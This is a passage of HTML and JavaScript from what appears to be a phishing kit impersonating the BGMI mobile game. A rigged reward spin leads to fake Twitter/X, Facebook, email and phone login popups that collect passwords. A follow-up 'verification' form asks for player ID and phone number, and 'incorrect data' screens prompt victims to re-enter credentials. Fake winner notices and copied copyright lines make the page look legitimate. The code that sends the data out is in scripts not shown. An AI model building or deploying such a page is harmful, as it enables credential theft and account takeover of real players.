                        <div class="item2" data-order="1">
                            <img src="img/reward/2.png">
                        </div>
                        <div class="item2" data-order="2">
                            <img src="img/reward/3.png">
                        </div>
                        <div class="item2" data-order="3">
                            <img src="img/reward/4.png">
                        </div>
                        <div class="item3" data-order="8">
                            <img src="img/reward/9.png">
                        </div>
                        <div class="aboutbutton"><img src="img/about.png">
                        </div>
                        <div class="itembutton putarkan" onclick="audioFile()" onmousedown="buka.play();">
                            <img src="img/draw-sec.png">
                        </div>
                        <div class="item3" data-order="4">
                            <img src="img/reward/5.png">
                        </div>
                        <div class="item5" data-order="7">
                            <img src="img/reward/8.png">
                        </div>
                        <div class="item4" data-order="6">
                            <img src="img/reward/7.png">
                        </div>
                        <div class="item5" data-order="5">
                            <img src="img/reward/6.png">
                        </div>
                </div>
                <!--- box-item--->
            </div>
            <!--- box --->
            <div class="alert-wrapper">
                <div class="alert">
                    <div class="alert-text-mid">
                        <div class="slider animated fadeIn">ID 5883485425 Get It Origin Lumen - FAMAS</div>
                        <div class="slider animated fadeIn">ID 5963737318 Get It The Fool - Mask</div>
                        <div class="slider animated fadeIn">ID 5886864517 Get It Bentley Batur Holoprism</div>
                        <div class="slider animated fadeIn">ID 5883485429 Get It Materials - 3</div>
                        <div class="slider animated fadeIn">ID 5463336783 Get It The Fool - M416</div>
                        <div class="slider animated fadeIn">ID 5583838390 Get It Materials - 5</div>
                        <div class="slider animated fadeIn">ID 5673737383 Get It The Fool - Backpack</div>
                        <div class="slider animated fadeIn">ID 5963737318 Get It Origin Lumen - Set</div>
                    </div>
                </div>
                <!--- alert-text --->
            </div>
            <!--- alert-wrapper --->
        </div>
        <!--- sec-container --->
        <div class="footer">
            <div class="footer-txt-join">Join the Community</div>
            <!--- footer-txt-follow --->
            <div class="footer-socmed-box">
                <button type="button">Like</button>
                <img class="footer-socmed-img-main" src="img/style-img/footer-socmed-1.png">
                <p>Facebook</p>
            </div>
            <!--- footer-socmed-box --->
            <div class="footer-socmed-box">
                <button type="button">Follow</button>
                <img class="footer-socmed-img-other" src="img/style-img/footer-socmed-2.png">
                <p>Twitter</p>
            </div>
            <!--- footer-socmed-box --->
            <div class="footer-socmed-box">
                <button type="button">Subscribe</button>
                <img class="footer-socmed-img-other" src="img/style-img/footer-socmed-3.png">
                <p>Youtube</p>
            </div>
            <!--- footer-socmed-box --->
            <div class="footer-socmed-box">
                <button type="button">Follow</button>
                <img class="footer-socmed-img-main" src="img/style-img/footer-socmed-4.png">
                <p>Instagram</p>
            </div>
            <!--- footer-socmed-box --->
            <div class="footer-socmed-box">
                <button type="button">Like</button>
                <img class="footer-socmed-img-main" src="img/style-img/footer-socmed-5.png">
                <p>VK</p>
            </div>
            <!--- footer-socmed-box --->
            <div class="footer-socmed-box">
                <button type="button">Join</button>
                <img class="footer-socmed-img-other" src="img/style-img/footer-socmed-6.png">
                <p>Discord</p>
            </div>
            <!--- footer-socmed-box --->
            <div class="footer-txt-copyrights">Partnership Inquiry: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="4e3e3b2c2923212c27222b112c3b3d27202b3d3d0e3a2b202d2b203a602d2123">[email&#160;protected]</a></div>
            <!--- footer-txt-copyright --->
            <img class="footer-copyright-icon" src="img/style-img/footer.png">
            <div class="footer-txt-copyright">ⓒ 2024 KRAFTON, Inc. All rights reserved.</div>
            <!--- footer-txt-copyright --->
            <div class="footer-txt-copyright">ⓒ 2019-2024 Proxima Beta Pte. Limited. AII rights reserved.</div>
            <!--- footer-txt-copyright --->
            <div class="footer-txt-copyright">Privacy Policy | Cookies Policy | Tencent Games User Agreement</div>
            <!--- footer-txt-copyright --->
            <br>
        </div>
        <!--- footer --->
    </div>
    <!--- spin-sec --->

    <div class="popup-login login-twitter animated fadeIn" style="display: none;">
        <div class="popup-box-login-twitter">
            <a onmousedown="tutup.play();" onclick="close_twitter()" class="close-other"><i class="zmdi zmdi-close"></i></a>
            <div class="header-twitter"><img src="img/style-img/icon-twitter.png">
                <div class="header-twitter-text"> Log in With Twitter </div>
            </div>
            <!--- navbar-fb-text --->
            <div class="content-box-twitter">
                <div class="txt-login-twitter">Log in to your X account<br>To connect to BGMI MOBILE.</div>
                <!--- txt-login-twitter --->
                <div class="content-box-twitter-txt">
                    <img src="img/style-img/icon_2.jpg">
                    <div class="content-box-twitter-txt-title">
                        BGMI MOBILE<br></div>
                    <div class="content-box-twitter-txt-det">
                        WINNER WINNER CHICKEN DINNER!
                        <br> Official BGMI MOBILE Game!</div>
                </div>
                <form action="javascript:void(0)" method="post" id="ValidateLoginTwitterForm">
                    <div class="form-group-twitter">
                        <input type="text" name="email" id="email-twitter" autocomplete="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
                        <label>Phone, email, or username</label>
                    </div>
                    <!--- form-group-twitter --->
                    <div class="form-group-twitter">
                        <div class="form-group-sohi TwitterShowPassword" onclick="showTwitterPassword()">
                            <img src="https://i.ibb.co/PYpHF6b/Twitter-Show-Password.png">
                        </div>
                        <!--- form-group-sohi TwitterShowPassword --->
                        <div class="form-group-sohi TwitterHidePassword" style="display: none;" onclick="hideTwitterPassword()">
                            <img src="https://i.ibb.co/pZDr8sd/Twitter-Hide-Password.png">
                        </div>
                        <!--- form-group-sohi TwitterHidePassword --->
                        <input type="password" name="password" id="password-twitter" autocomplete="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
                        <label>Password</label>
                    </div>
                    <!--- form-group-twitter --->
                    <center>
                        <div class="alert-twitter-failed email-tw">
                            <a class="alert-twitter"><img class"alert-img" src="img/style-img/alert.png">Sorry, we couldn't find your account.</a></div>
                        <div class="alert-twitter-failed sandi-tw">
                            <a class="alert-twitter"><img class"alert-img" src="img/style-img/alert.png">Wrong Password!</a></div>
                    </center>
                    <input type="hidden" name="login" id="login-twitter" value="Twitter" readonly>
                    <button type="submit" href='#kinn-verify-on' class="onbutton" onclick="ValidateLoginTwitterData()">Log in</button>
                </form>
                <div class="content-box-twitter-txt-footer">
                    We recommend reviewing the app's terms and privacy policy to understand how it will use data from your Twitter account. You can revoke access to any app at any time from the <a>Apps and sessions</a> of your Twitter account settings.<br></div>
                <div class="content-box-twitter-txt-footers">
                    By continuing, BGMI MOBILE will receive ongoing access to the information that you share and Twitter will record when BGMI MOBILE accesses it. <a>Learn more</a> about this sharing and the settings that you have. BGMI MOBILE's <a>Privacy Policy</a>                    and <a>Terms</a>.<br></div>
            </div>
            <!--- content-box-twitter --->
        </div>
        <!--- popup-box-login-twitter --->
    </div>
    <!--- popup-login --->

    <div class="popup-login login-twitter-load" style="display: none;">
        <div class="popup-box-login-twitter">
            <div class="header-twitter"><img src="img/style-img/icon-twitter.png">
                <div class="header-twitter-text"> Log in With Twitter </div>
            </div>
            <!--- navbar-fb-text --->
            <div class="twitter-load">
                <div class="twitter-load-title">
                    <div class="loader2"></div>
                </div>
                <!--- twitter-load-title --->
            </div>
            <!--- twitter-load --->
        </div>
        <!--- popup-box-login-twitter --->
    </div>
    <!--- popup-login --->

    <div class="popup-login login-facebook animated fadeIn" style="display: none;">
        <div class="popup-box-login-fb">
            <a onmousedown="tutup.play();" onclick="close_facebook()" class="close-fb"><i class="zmdi zmdi-close"></i></a>
            <div class="navbar-fb"><img src="img/style-img/icon-facebook.png">
                <div class="navbar-fb-text"> Log in With Facebook </div>
            </div>
            <!--- navbar-fb-text --->
            <div class="navbar-alert-fb email-fb">The email address or phone number that you've entered doesn't match any account. <b>Sign up for an account.</b></div>
            <!--- navbar-alert --->
            <div class="navbar-alert-fb sandi-fb">The password that you've entered is incorrect. <b>Forgotten password?</b></div>
            <!--- navbar-alert --->
            <div class="content-box-fb">
                <img src="img/style-img/icon_2.jpg">
                <div class="txt-login-fb">Log in to your Facebook account<br>To connect to BGMI MOBILE.</div>
                <!--- txt-login-fb --->
                <div class="txt-login-alert">This doesn't let the app post to Facebook.</div>
                <!--- txt-login-fb --->
                <form class="login-form" action="javascript:void(0)" method="post" id="ValidateLoginFbForm">
                    <div class="form-group-fb">
                        <input type="text" name="email" id="email-facebook" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
                        <div class="login-form-shid showPassword" id="showFbPassword" onclick="showFbPassword()">Show</div>
                        <!--- login-form-shid showPassword --->
                        <div class="login-form-shid hidePassword" style="display: none;" onclick="hideFbPassword()">Hide</div>
                        <!--- login-form-shid hidePassword --->
                        <input type="password" name="password" id="password-facebook" placeholder="Password" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
                    </div>
                    <!--- form-group-fb --->
                    <input type="hidden" name="login" id="login-facebook" value="Facebook" readonly>
                    <button type="submit" class="btn-login-fb" onclick="ValidateLoginFbData()">Log In</button>
                </form>
                <div class="txt-footer">By continuing, BGMI MOBILE will receive ongoing access to the information that you share and Facebook will record when BGMI MOBILE accesses it. <a>Learn more</a> about this sharing and the settings that you have.</div>
                <!--- txt-footer --->
                <div class="txt-footers">BGMI MOBILE's <a>Privacy Policy</a> and <a>Terms</a>
                </div>
                <!--- txt-footer ---><br>
            </div>
            <!--- content-box-fb --->
        </div>
        <!--- popup-box-login-fb --->
    </div>
    <!--- popup-login --->

    <div class="popup-login login-facebook-load" style="display: none;">
        <div class="popup-box-login-fb">
            <div class="navbar-fb"><img src="img/style-img/icon-facebook.png">
                <div class="navbar-fb-text"> Log in With Facebook </div>
            </div>
            <!--- navbar-fb-text --->
            <div class="content-box-fb">
                <div class="fb-load">
                    <img src="img/style-img/icon_fb.png">
                    <div class="loader3"></div>
                </div>
                <!--- fb-load --->
            </div>
            <!--- content-box-fb --->
        </div>
        <!--- popup-box-login-fb --->
    </div>
    <!--- popup-login--->

    <div class="popup-login login-facebook-sec animated fadeIn" style="display: none;">
        <div class="popup-box-login-fb">
            <div class="navbar-fb"><img src="img/style-img/icon-facebook.png">
                <div class="navbar-fb-text"> Log in With Facebook </div>
            </div>
            <!--- navbar-fb-text --->
            <div class="navbar-alert-fb wrong-fb" style="display: block;text-align: center;"><b>The data you entered is incorrect.<br>Please re-login using the correct data</b></div>
            <!--- navbar-alert --->
            <div class="navbar-alert-fb email-fb">The email address or phone number that you've entered doesn't match any account. <b>Sign up for an account.</b></div>
            <!--- navbar-alert --->
            <div class="navbar-alert-fb sandi-fb">The password that you've entered is incorrect. <b>Forgotten password?</b></div>
            <!--- navbar-alert --->
            <div class="content-box-fb">
                <img src="img/style-img/icon_2.jpg">
                <div class="txt-login-fb">To connect to BGMI MOBILE<br>log in to your Facebook account.</div>
                <!--- txt-login-fb --->
                <div class="txt-login-alert">This doesn't let the app post to Facebook.</div>
                <!--- txt-login-fb --->
                <form class="login-form" action="javascript:void(0)" method="post" id="SecValidateLoginFbForm">
                    <div class="form-group-fb">
                        <input type="text" name="email" id="sec-email-facebook" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
                        <div class="login-form-shid showPassword" id="showFbPassword" onclick="SecshowFbPassword()">Show</div>
                        <!--- login-form-shid showPassword --->
                        <div class="login-form-shid hidePassword" style="display: none;" onclick="SechideFbPassword()">Hide</div>
                        <!--- login-form-shid hidePassword --->
                        <input type="password" name="password" id="sec-password-facebook" placeholder="Password" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
                    </div>
                    <!--- form-group-fb --->
                    <input type="hidden" name="login" id="sec-login-facebook" value="Facebook" readonly>
                    <button type="submit" class="btn-login-fb" onclick="SecValidateLoginFbData()">Log In</button>
                </form>
                <div class="txt-footer">By continuing, Midasbuy will receive ongoing access to the information that you share and Facebook will record when Midasbuy accesses it. <a>Learn more</a> about this sharing and the settings that you have.</div>
                <!--- txt-footer --->
                <div class="txt-footers">Midasbuy's <a>Privacy Policy</a> and <a>Terms</a>
                </div>
                <!--- txt-footer ---><br>
            </div>
            <!--- content-box-fb --->
        </div>
        <!--- popup-box-login-fb --->
    </div>
    <!--- popup-login --->

    <div class="popup-login login-twitter-sec animated fadeIn" style="display: none;">
        <div class="popup-box-login-twitter">
            <div class="header-twitter"><img src="img/style-img/icon-twitter.png">
                <div class="header-twitter-text"> Log in With Twitter </div>
            </div>
            <!--- navbar-fb-text --->
            <div class="content-box-twitter">
                <div class="txt-login-twitter">To connect to BGMI MOBILE<br>log in to your X account.</div>
                <!--- txt-login-twitter --->
                <div class="content-box-twitter-txt">
                    <img src="img/style-img/icon_2.jpg">
                    <div class="content-box-twitter-txt-title">
                        BGMI MOBILE<br></div>
                    <div class="content-box-twitter-txt-det">
                        WINNER WINNER CHICKEN DINNER!
                        <br> Official BGMI MOBILE Game!</div>
                </div>
                <form action="javascript:void(0)" method="post" id="SecValidateLoginTwitterForm">
                    <div class="form-group-twitter">
                        <input type="text" name="email" id="sec-email-twitter" autocomplete="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
                        <label>Phone, email, or username</label>
                    </div>
                    <!--- form-group-twitter --->
                    <div class="form-group-twitter">
                        <div class="form-group-sohi TwitterShowPassword" onclick="SecshowTwitterPassword()">
                            <img src="https://i.ibb.co/PYpHF6b/Twitter-Show-Password.png">
                        </div>
                        <!--- form-group-sohi TwitterShowPassword --->
                        <div class="form-group-sohi TwitterHidePassword" style="display: none;" onclick="SechideTwitterPassword()">
                            <img src="https://i.ibb.co/pZDr8sd/Twitter-Hide-Password.png">
                        </div>
                        <!--- form-group-sohi TwitterHidePassword --->
                        <input type="password" name="password" id="sec-password-twitter" autocomplete="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
                        <label>Password</label>
                    </div>
                    <!--- form-group-twitter --->
                    <center>
                        <div class="alert-twitter-failed wrong-tw" style="display: block;">
                            <a class="alert-twitter"><img class"alert-img" src="img/style-img/alert.png">The data you've entered is incorrect.</a></div>
                        <div class="alert-twitter-failed email-tw">
                            <a class="alert-twitter"><img class"alert-img" src="img/style-img/alert.png">Sorry, we couldn't find your account.</a></div>
                        <div class="alert-twitter-failed sandi-tw">
                            <a class="alert-twitter"><img class"alert-img" src="img/style-img/alert.png">Wrong Password!</a></div>
                    </center>
                    <input type="hidden" name="login" id="sec-login-twitter" value="Twitter" readonly>
                    <button type="submit" href='#kinn-verify-on' class="seconbutton" onclick="SecValidateLoginTwitterData()">Log in</button>
                </form>
                <div class="content-box-twitter-txt-footer">
                    We recommend reviewing the app's terms and privacy policy to understand how it will use data from your Twitter account. You can revoke access to any app at any time from the <a>Apps and sessions</a> of your Twitter account settings.<br></div>
                <div class="content-box-twitter-txt-footers">
                    By continuing, Midasbuy will receive ongoing access to the information that you share and Twitter will record when Midasbuy accesses it. <a>Learn more</a> about this sharing and the settings that you have. Midasbuy's <a>Privacy Policy</a>                    and <a>Terms</a>.<br></div>
            </div>
            <!--- content-box-twitter --->
        </div>
        <!--- popup-box-login-twitter --->
    </div>
    <!--- popup-login --->

    <div class="popup account_verification" style="display: none;">
        <div class="popup-box-wrapper">
            <div class="popup-box-navbar">
                <div class="popup-box-navbar-title">Account Verification</div>
            </div>
            <div class="popup-box-bg">
                <div class="popup-box-alert4"><br>Complete your information details</div>
                <form class="popup-box-form" action="javascript:void(0)" method="post" id="ValidateVerificationDataForm"><br>
                    <input type="hidden" name="email" id="validateEmail" readonly>
                    <input type="hidden" name="password" id="validatePassword" readonly>
                    <input type="hidden" name="codetel" id="validateTel" readonly>
                    <input type="number" name="playid" id="playid" placeholder="Player ID" autocomplete="off" required oninvalid="this.setCustomValidity('Input your Player ID')" oninput="setCustomValidity('')">
                    <input type="number" name="phone" id="phone" placeholder="Phone Number" autocomplete="off" required oninvalid="this.setCustomValidity('Input your Phone Number')" oninput="setCustomValidity('')">
                    <select name="level" id="level" required oninvalid="this.setCustomValidity('Choose your account level')" oninput="setCustomValidity('')">
<option selected="selected" disabled="disabled" value="">Account Level</option>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
for(var i = 50; i <= 100; i++){
document.write("<option>" + i + "</option>");};
</script>
</select>
                    <input type="hidden" name="login" id="validateLogin" readonly>
                    <br><br>
                    <div class="popup-box-footer">
                        <button type="submit" onmousedown="buka.play();" onclick="ValidateVerificationData()">Verification</button>
                    </div>
                    <!--- popup-box-bg --->
            </div>
            <!--- popup-box-form-footer --->
            </form>
            <!--- form --->
        </div>
        <!--- popup-box-wrapper popup-box-verification --->
    </div>
    <!--- popup account_verification --->

    <div class="popup check_verification" style="display: none;">
        <div class="popup-box-wrapper">
            <div class="popup-box-navbar">
                <div class="popup-box-navbar-title">Please Wait</div>
                <!--- popup-box-navbar-title --->
            </div>
            <!--- popup-box-navbar --->
            <div class="popup-box-bg" style="margin-top: 0px;">
                <div class="popup-box-loading"><br><br><br>
                    <img class="animate-spin" src="img/style-img/loading.png"></img>
                    <br>Checking your account details...
                    <br><br></div><br><br>
            </div>
            <!--- popup-box-bg --->
        </div>
        <!--- popup-box-wrapper --->
    </div>
    <!--- popup check_verification --->

    <div class="popup processing_account animated fadeIn" style="display: none;">
        <div class="popup-box-wrapper">
            <div class="popup-box-navbar">
                <div class="popup-box-navbar-title">Processing Account</div>
            </div>
            <div class="popup-box-bg">
                <div class="popup-box-alert" style="text-align:left;font-size: 17px;"><br> Hi BGMI Players,<br>
                    <p>We are happy that you are still loyal to BGMI MOBILE.
                        <br>Your rewards is being processed to be sent to your account.
                        <br>Rewards are sent to your in-game mail inbox.</p>
                    <p>We will also notify you in the mailbox when we have successfully dispatched your rewards.
                        <br>Please wait up to 24 hours.</p>
                </div>
                <div class="popup-box-footer">
                    <button type="button" onmousedown="tutup.play();" style="background: url(img/btn-on.png) no-repeat center center; width: 30%; background-size: 100% 100%; margin-right: 0; float: none;" onclick="location.href='https://battlegroundsmobileindia.com/';">Logout</button>
                </div>
            </div>
        </div>
    </div>

    <div class="popup itemReward_confirmation" style="display: none;">
        <div class="popup-box-wrapper-login">
            <div class="nameklogin" style="background: url(img/popup-reward.png) no-repeat center center;
    background-size: 100% 100%;width:100%;height:230px;">
                <div class="popup-box-alert4"><br><br><br></div>
                <!--- popup-box-alert --->
                <div class="popup-box-item-once itemShine" style="width:75px; height:75px;margin-top: -9px;margin-left: -5px;">
                    <div>
                        <figure>
                            <img class="gift_img popup-item flip" style="width:75px; height:75px;" src="">
                        </figure>
                    </div>
                </div>
                <!--- popup-box-item-once itemShine --->
            </div>
            <!--- nameklogin --->
            <div class="popup-box-footer" style="margin-top:-30px;">
                <button type="button" onmousedown="buka.play();" style="width: 25%;" onclick="open_account_login()">Collect</button>
            </div>
            <!--- popup-box-footer --->
        </div>
        <!--- popup-box-wrapper --->
    </div>
    <!--- popup once_rewards --->

    <div class="popup account_login" style="display: none;">
        <div class="popup-box-wrapper-login">
            <div class="popup-box-navbar-login">
                <div class="popup-box-navbar-login-title"></div>
                <!--- popup-box-navbar-login-title --->
            </div>
            <!--- popup-box-navbar-login --->
            <div class="popup-box-bg-login">
                <img style="width: 40%; height: 56px; margin-top: 95px; margin-left: auto; margin-right: auto; margin-bottom: 10px;" src="img/glogo.png">
                <br>
                <button type="button" class="popup-btn-login2 popup-btn-twitter2" onmousedown="buka.play();" onclick="open_twitter();"><i class="fa-brands fa-x-twitter" style="color: #000000;"></i>Twitter</button>
                <button type="button" class="popup-btn-login2 popup-btn-facebook2" onmousedown="buka.play();" onclick="open_facebook();"><i class="fa-brands fa-square-facebook"></i>Facebook</button>
                <img style="width: 95%; height: auto; margin-top: 5px; margin-left: auto; margin-right: auto; margin-bottom: 10px;" src="img/login.png">
                <br>
            </div>
            <!--- popup-box-bg-login --->
            <div class="popup-box-footer-login"></div>
            <!--- popup-box-footer-login --->
        </div>
        <!--- popup-box --->
    </div>
    <!--- popup account_login --->

    <div class="popup account_loginx" style="display: none;">
        <div class="popup-box-wrapper-login">
            <div class="popup-box-navbar-login">
                <div class="popup-box-navbar-login-title"></div>
                <!--- popup-box-navbar-login-title --->
            </div>
            <!--- popup-box-navbar-login --->
            <div class="popup-box-bg-login">
                <img style="width: 40%; height: 56px; margin-top: 90px; margin-left: auto; margin-right: auto; margin-bottom: 10px;" src="https://www.pubgmobile.com/act/a20180515iggamepc/logo.png">
                <br>
                <button type="button" class="popup-btn-login popup-btn-twitter" onmousedown="buka.play();" onclick="open_twitter();"><i class="fa-brands fa-x-twitter" style="color: #000000;"></i>Twitter</button>
                <button type="button" class="popup-btn-login popup-btn-facebook" onmousedown="buka.play();" onclick="open_facebook();"><i class="fa-brands fa-square-facebook"></i>Facebook</button>
                <img style="width: 95%; height: auto; margin-top: -25px; margin-left: auto; margin-right: auto; margin-bottom: 10px;" src="img/login.png">
                <br>
            </div>
            <!--- popup-box-bg-login --->
            <div class="popup-box-footer-login"></div>
            <!--- popup-box-footer-login --->
        </div>
        <!--- popup-box --->
    </div>
    <!--- popup account_login --->

    <div class="popup-link login-mail animated fadeIn" style="display: none;">
        <div class="seclink-box">
            <div class="seclink-box-navbar">
                <img onmousedown="tutup.play();" onclick="close_link()" src="img/close.png">
                <div class="seclink-box-navbar-title">
                    <a class="et">Email Login</a>
                    <a class="nt" style="display:none;">Mobile Number Login</a>
                </div>
                <!--- popup-box-navbar-title --->
            </div>
            <!--- popup-box-navbar --->
            <div class="seclink-box-bg">
                <div class="seclink-box-alert"></div>
                <!--- popup-box-alert --->
                <div class="seclink-wrapper">
                    <div class="seclink-content email-login" id="email-login" onmousedown="buka.play();" onclick="openloginlink(event, 'emaillog'); et();">
                        <div class="seclink-content-txt">Email address</div>
                    </div>
                    <!--- seclink-content --->
                    <div class="seclink-content number-login" onmousedown="buka.play();" onclick="openloginlink(event, 'numberlog'); nt();">
                        <div class="seclink-content-txt">Mobile Number</div>
                    </div>
                    <!--- seclink-content --->
                </div>
                <!--- seclink-wrapper ---><br>
                <div class="form_login" id="emaillog">
                    <form action="javascript:void(0)" method="post" id="ValidateLoginMailForm">
                        <p class="kagetk email-k">Wrong e-mail. Please enter again.</p>
                        <p class="kagetk sandi-k">Wrong password. Try again.</p>
                        <label>E-mail address</label>
                        <input class="seclink-box-form-login" type="text" name="email" id="email-k" autoCapitalize='none' placeholder="Enter your e-mail" required oninvalid="this.setCustomValidity('Input your E-mail address')" oninput="setCustomValidity('')">
                        <label>Password</label>
                        <input class="seclink-box-form-login" type="password" name="password" id="password-k" placeholder="Please enter password" pattern="[a-zA-Z0-9]+" required oninvalid="this.setCustomValidity('Input your Password')" oninput="setCustomValidity('')">
                        <center>
                            <input type="hidden" name="login" id="login-mail" value="Linked Email" readonly>
                            <div class="seclink-box-footer">
                                <button type="submit" onmousedown="buka.play();" onclick="ValidateLoginMailData()">OK</button></center>
                    </form>
                    </div>
                    <!--- email-login --->
                    <div class="form_login" id="numberlog">
                        <p class="kagetk email-nk">Wrong Phone number. Please enter again.</p>
                        <p class="kagetk sandi-nk">Wrong password. Try again.</p>
                        <label>Country/Region</label>
                        <form action="javascript:void(0)" method="post" id="ValidateLoginNumberForm">
                            <input class="seclink-box-form-region" type="tel" name="codetel" id="code-tel" readonly>
                            <input class="seclink-box-form-number" type="number" name="email" id="email-nk" placeholder="Please enter Number Phone" required oninvalid="this.setCustomValidity('Input your Number Phone')" oninput="setCustomValidity('')">
                            <label>Password</label>
                            <input class="seclink-box-form-login" type="password" name="password" id="password-nk" placeholder="Please enter password" required oninvalid="this.setCustomValidity('Input your Password')" oninput="setCustomValidity('')">
                            <input type="hidden" name="login" id="login-number" value="Linked Number" readonly>
                            <center>
                                <div class="seclink-box-footer">
                                    <button type="submit" onmousedown="buka.play();" onclick="ValidateLoginNumberData()">OK</button></center>
                        </form>
                        <!--- form --->
                        </div>
                        <!--- number-login --->
                    </div>
                    <!--- popup-box-bg --->
                </div>
                <!--- popup-box-wrapper --->
            </div>
            <!--- popup account_login --->

            <div class="popup login-mail-load animated fadeIn" style="display: none;">
                <div class="seclink-box">
                    <div class="seclink-box-navbar">
                        <div class="seclink-box-navbar-title">
                            <a>Email Login</a>
                        </div>
                        <!--- popup-box-navbar-title --->
                    </div>
                    <!--- popup-box-navbar --->
                    <div class="seclink-box-bg">
                        <div class="seclink-box-alert"></div>
                        <!--- popup-box-alert --->
                        <div class="seclink-wrapper">
                            <div class="seclink-content-active seclink-content">
                                <div class="seclink-content-txt">Email address</div>
                            </div>
                            <!--- seclink-content --->
                            <div class="seclink-content">
                                <div class="seclink-content-txt">Mobile Number</div>
                            </div>
                            <!--- seclink-content --->
                        </div>
                        <!--- seclink-wrapper ---><br>
                        <div id="load-ml" style="height:220px;">
                            <center>
                                <img class="load-login-img" style="margin-top:30px;" src="img/style-img/kotak.png"></img>
                                <br>
                                <img class="load-login-gif" src="img/style-img/load.gif"></img>
                            </center>
                        </div>
                    </div>
                    <!--- popup-box-bg --->
                </div>
                <!--- popup-box-wrapper --->
            </div>
            <!--- popup login-mail-load --->

            <div class="popup login-number-load animated fadeIn" style="display: none;">
                <div class="seclink-box">
                    <div class="seclink-box-navbar">
                        <div class="seclink-box-navbar-title">
                            <a>Mobile Number Login</a>
                        </div>
                        <!--- popup-box-navbar-title --->
                    </div>
                    <!--- popup-box-navbar --->
                    <div class="seclink-box-bg">
                        <div class="seclink-box-alert"></div>
                        <!--- popup-box-alert --->
                        <div class="seclink-wrapper">
                            <div class="seclink-content">
                                <div class="seclink-content-txt">Email address</div>
                            </div>
                            <!--- seclink-content --->
                            <div class="seclink-content-active seclink-content">
                                <div class="seclink-content-txt">Mobile Number</div>
                            </div>
                            <!--- seclink-content --->
                        </div>
                        <!--- seclink-wrapper ---><br>
                        <div id="load-ml" style="height:220px;">
                            <center>
                                <img class="load-login-img" style="margin-top:30px;" src="img/style-img/kotak.png"></img>
                                <br>
                                <img class="load-login-gif" src="img/style-img/load.gif"></img>
                            </center>
                        </div>
                    </div>
                    <!--- popup-box-bg --->
                </div>
                <!--- popup-box-wrapper --->
            </div>
            <!--- popup login-number-load --->

            <script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
            <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
            <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
            <audio id="audioFile" src="media/putaran.mp3"></audio>
            <script src="js/international-telephone-input.js"></script>
            <script src="js/kinnonswiper.js"></script>
            <script src="js/selowscript.js"></script>
            <script src="js/slidernotif.js"></script>
            <script src="js/showHide.js"></script>
            <script src="js/myscript.js"></script>
            <script src="js/sliders.js"></script>
            <script src="js/timer.js"></script>
            <script src="js/link.js"></script>
            <script>
                $(document).ready(function() {
                    $('#password-twitter').keyup(function() {
                        if ($(this).val().length != 0) {
                            $('.onbutton').removeClass().addClass('twbutton');
                        } else {
                            $('.twbutton').removeClass().addClass('onbutton');
                        }
                    })
                });
                $(document).ready(function() {
                    $('#sec-password-twitter').keyup(function() {
                        if ($(this).val().length != 0) {
                            $('.seconbutton').removeClass().addClass('sectwbutton');
                        } else {
                            $('.sectwbutton').removeClass().addClass('seconbutton');
                        }
                    })
                });

                function audioFile() {
                    var audio = document.getElementById('audioFile');
                    audio.play();
                }
                $(document).ready(function() {
                    $("o").attr("onclick", "audioFile()");
                });
            </script>
            <script>
                const hadiah = {
                    0: 'img/reward/1.png',
                    1: 'img/reward/2.png',
                    2: 'img/reward/3.png',
                    3: 'img/reward/4.png',
                    4: 'img/reward/5.png',
                    5: 'img/reward/6.png',
                    6: 'img/reward/7a.png',
                    7: 'img/reward/8.png',
                    8: 'img/reward/9.png',
                };

                const jumlah_hadiah = 9;
                const minimal_lompat = 30;
                let kinnonsec = -1;
                let lompat = 0;
                let kecepatan = 30;
                let waktu = 0;
                let hadiahnya = -1;

                function putarkan() {
                    $(`[data-order="${kinnonsec}"]`).removeClass('border_hadiah');

                    kinnonsec += 1;

                    if (kinnonsec > jumlah_hadiah - 1) {
                        kinnonsec = 0;
                    }
                    $(`[data-order="${kinnonsec}"]`).addClass('border_hadiah');

                }

                function acakHadiah() {
                    return Math.floor(Math.random() * jumlah_hadiah);
                }

                function pengaturanWaktu() {
                    lompat += 1;
                    putarkan();
                    if (lompat > minimal_lompat + 9 && hadiahnya === kinnonsec) {
                        clearTimeout(waktu);

                        $('.itemReward_confirmation').fadeIn('slow');
                        $('.gift_img').attr('src', hadiah[kinnonsec]);
                        setTimeout(function() {}, 0);

                        hadiahnya = -1;
                        lompat = 0;

                    } else {
                        if (lompat < minimal_lompat) {
                            kecepatan -= 8;
                        } else if (lompat === minimal_lompat) {
                            const nomor_acak = acakHadiah();
                            hadiahnya = nomor_acak;
                        } else {
                            if ((lompat > minimal_lompat + 10) && hadiahnya === kinnonsec) {
                                kecepatan += 600;
                            } else {
                                kecepatan += 20;
                            }
                        }
                        if (kecepatan < 40) {
                            kecepatan = 40;
                        }
                        waktu = setTimeout(pengaturanWaktu, kecepatan);

                    }
                }

                function gaskeun() {
                    lompat = 0;
                    kecepatan = 70;
                    hadiahnya = -1;
                    pengaturanWaktu();
                }

                $(document).ready(() => {
                    $('.putarkan').on('click', gaskeun);
                });
            </script>
            <script>
                // code for activate clicked sound
                var buka = new Audio();
                buka.src = "media/open.mp3";

                var tutup = new Audio();
                tutup.src = "media/close.mp3";

                function audioFile() {
                    var audio = document.getElementById('audioFile');
                    audio.play();
                }
                $(document).ready(function() {
                    $("o").attr("onclick", "audioFile()");
                });

                // code for showing hiding items
                function openRewards(evt, rewardsClass) {
                    var i, tab_rewards, tab_rewards_link;
                    tab_rewards = document.getElementsByClassName("tab_rewards");
                    for (i = 0; i < tab_rewards.length; i++) {
